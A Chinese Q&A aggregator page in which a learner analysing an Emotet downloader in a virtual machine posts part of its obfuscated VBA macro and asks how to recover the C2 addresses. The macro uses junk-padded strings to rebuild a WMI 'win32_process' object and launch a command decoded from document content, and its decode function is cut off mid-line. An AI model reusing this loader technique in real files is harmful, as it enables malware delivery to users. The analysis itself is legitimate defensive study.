问题描述
Rem Attribute VBA_ModuleType=VBAModule
Function Pvmy3e5pi02a()
On Error Resume Next
V1 = F8fma895pdl_520 + Bdo4m58vjv9.Content + Rjhzjcx0bb2ls
U7 = "sg yw ahpsg yw ah"
M95y_17bfbpc01 = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
X8y_8d9_108jst9dv = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
Gwt8f7nca4dxdzfpa = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
A2lxiyzqc0m8nx948j = "sg yw ahsg yw ah" + Mid(Application.Name,3 + 3,1 / 1) + "sg yw ahsg yw ah"
Pf346jpryf9cbhb_ = Gwt8f7nca4dxdzfpa + A2lxiyzqc0m8nx948j + X8y_8d9_108jst9dv + U7 + M95y_17bfbpc01
Ug7nr1e2xytla = Yztju0nsx4ysyla4zr(Pf346jpryf9cbhb_)
Set Tnvtrcblzoc65_a60u = CreateObject(Ug7nr1e2xytla)
KK = Yztju0nsx4ysyla4zr(Mid(V1,(4),Len(V1)))
Tnvtrcblzoc65_a60u.Create KK,Mc128jrkvrj8yj,Oz5q8st219f
End Function
Function Yztju0nsx4ysyla4zr(Gr8efgfcyj897hw)
On Error Resume Next
J6_wzassead = Gr8efgfcyj897hw
Brrmiqocofcc = W97vyaghgw1(J6_wzassead)
Yztju0nsx4ysyla4zr = Brrmiqocofcc
End Function
Function W97vyaghgw1(Hzb0ysvte2w)
W97vyaghgw1 = Replace (" "," "," ")
所以我一直在尝试恶意软件分析,老实说我不太擅长,但我确实有编程背景,而且我相当精通技术。
我尝试分析了用于下载 emotnet 恶意软件的 vbs 脚本(我正在使用 virtualBox 以避免感染我的真实计算机),因为您可以看到这是反混淆形式的代码,我使用 notepad++ 摆脱了里面所有死的和无用的代码。
到目前为止,我最初的目标一直是获取获取将使用的 shell 代码所需的信息,以便我可以提取属于 c2 服务器的域和 IP 地址,因此我可以下载实际的恶意软件本身并实际开始分析它。
到目前为止我所做的是在每个函数上放置断点,我已经能够看到它,因为我假设将用于加密的字符串被修改,最终它们最终出现在最后一个函数和变量中代码,这是我从 wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ahsg yw ahsg yw ashhg yw ahsg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ahsg yw ahpsg yw ahsg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah 得到的输出,这有点令人失望,因为我期待一些重要的东西出现,但至少它做了一些事情。
我找不到有关此特定样本的任何信息,因为有关 emotnet 恶意软件分析的所有其他恶意软件分析文本都已过时,而且我似乎找不到涵盖此恶意软件最新版本的文本,因此 请帮帮我。
解决方法
暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!
如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。
小编邮箱:dio#foxmail.com (将#修改为@)